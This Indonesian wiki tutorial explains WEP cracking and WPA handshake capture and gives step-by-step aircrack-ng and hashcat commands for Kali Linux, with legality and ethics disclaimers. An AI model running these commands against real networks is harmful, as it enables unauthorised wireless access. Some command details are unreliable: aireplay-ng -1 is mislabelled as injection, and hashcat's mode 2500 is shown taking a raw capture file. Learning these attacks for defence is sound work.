Attacks: WEP Cracking, WPA Handshake Capture

From OnnoWiki
Revision as of 03:25, 22 September 2024 by Onnowpurbo (talk | contribs) (→‎WPA Handshake Capture:)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Memahami Serangan WEP Cracking dan WPA Handshake Capture

  • WEP Cracking: WEP (Wired Equivalent Privacy) adalah protokol keamanan jaringan nirkabel yang sudah dianggap usang karena memiliki kelemahan keamanan yang signifikan. Serangan WEP cracking bertujuan untuk memecahkan kunci enkripsi WEP dan mendapatkan akses tidak sah ke jaringan.
  • WPA Handshake Capture: WPA (Wi-Fi Protected Access) adalah protokol keamanan yang lebih kuat dari WEP. Namun, serangan WPA handshake capture mencoba menangkap paket handshake (pertukaran informasi awal antara klien dan titik akses) untuk kemudian dipecahkan menggunakan alat khusus.

Contoh Praktis Menggunakan Kali Linux 2024.3

Persiapan:

  • Pastikan kamu memiliki target jaringan: Pastikan kamu memiliki izin untuk melakukan pengujian pada jaringan yang menjadi target.
  • Pastikan adapter jaringan nirkabel kamu dalam mode monitor: Gunakan perintah `airmon-ng` untuk melihat daftar adapter dan `airmon-ng start wlan0` (ganti wlan0 dengan nama adapter kamu) untuk mengaktifkan mode monitor.
  • Cari jaringan target: Gunakan perintah `airodump-ng wlan0mon` (ganti wlan0mon dengan nama adapter dalam mode monitor) untuk memindai jaringan sekitar. Catat BSSID dan channel dari jaringan target.

WEP Cracking:

  • Mulai menangkap paket: `airodump-ng -c <channel> -w <file> wlan0mon` (ganti <channel> dengan nomor channel dan <file> dengan nama file untuk menyimpan paket).
  • Injeksi paket: `aireplay-ng -1 0 -a <BSSID> -c <client_BSSID> wlan0mon` (ganti <BSSID> dengan BSSID jaringan target dan <client_BSSID> dengan BSSID perangkat yang terhubung).
  • Crack kunci: Setelah mengumpulkan cukup banyak paket, gunakan alat seperti `aircrack-ng <file-01.cap>` untuk mencoba memecahkan kunci.

WPA Handshake Capture:

  • Mulai menangkap paket: Sama seperti pada WEP cracking, gunakan `airodump-ng` untuk menangkap paket.
  • Tunggu handshake: Tunggu hingga terjadi handshake antara klien dan titik akses. Kamu akan melihat pesan "handshake" di terminal.
  • Crack handshake: Gunakan alat seperti `hashcat` atau `john the ripper` untuk mencoba memecahkan handshake. Kamu perlu memiliki kamus atau daftar kata sandi yang kuat untuk proses ini.

Contoh Perintah:

# Mulai menangkap paket WEP
airodump-ng -c 6 -w wep_capture wlan0mon

# Mulai menangkap paket WPA
airodump-ng -c 11 -w wpa_capture wlan0mon

# Crack kunci WEP
aircrack-ng wep_capture-01.cap
# Crack handshake WPA (menggunakan hashcat)
hashcat -m 2500 wpa_capture-01.cap /path/to/rockyou.txt


Catatan:

  • Legalitas: Pastikan kamu memiliki izin yang sah untuk melakukan pengujian ini. Melakukan serangan pada jaringan tanpa izin adalah ilegal.
  • Etika: Gunakan alat ini untuk tujuan pembelajaran dan etis. Jangan menyalahgunakannya untuk tujuan jahat.
  • Kompleksitas: Proses cracking bisa memakan waktu yang lama, tergantung pada kekuatan sandi dan jumlah paket yang ditangkap.
  • Pengembangan: Protokol keamanan terus berkembang. WPA2 dan WPA3 dianggap lebih aman daripada WEP dan WPA.

Penting untuk diingat:

  • Tujuan pembelajaran: Tujuan utama dari latihan ini adalah untuk memahami konsep-konsep keamanan jaringan dan cara kerja serangan.
  • Pencegahan: Setelah memahami cara kerja serangan, kamu bisa menerapkan langkah-langkah keamanan yang lebih baik untuk melindungi jaringanmu.

Materi Tambahan:

Untuk mempelajari lebih lanjut, kamu bisa mencari tutorial dan dokumentasi yang lebih lengkap mengenai Kali Linux, airodump-ng, aircrack-ng, hashcat, dan konsep-konsep keamanan jaringan lainnya.

Disclaimer:

Informasi ini hanya untuk tujuan pendidikan dan penelitian. Penggunaan alat ini untuk tujuan ilegal dilarang keras.


Pranala Menarik

  • Ethical Hacking
  • Alat-alat lain yang bisa digunakan jaringan: seperti IV reuse, WPS attacks, dll.
  • Cara mengamankan jaringan nirkabel: seperti menggunakan WPA2/WPA3, filter MAC, dll.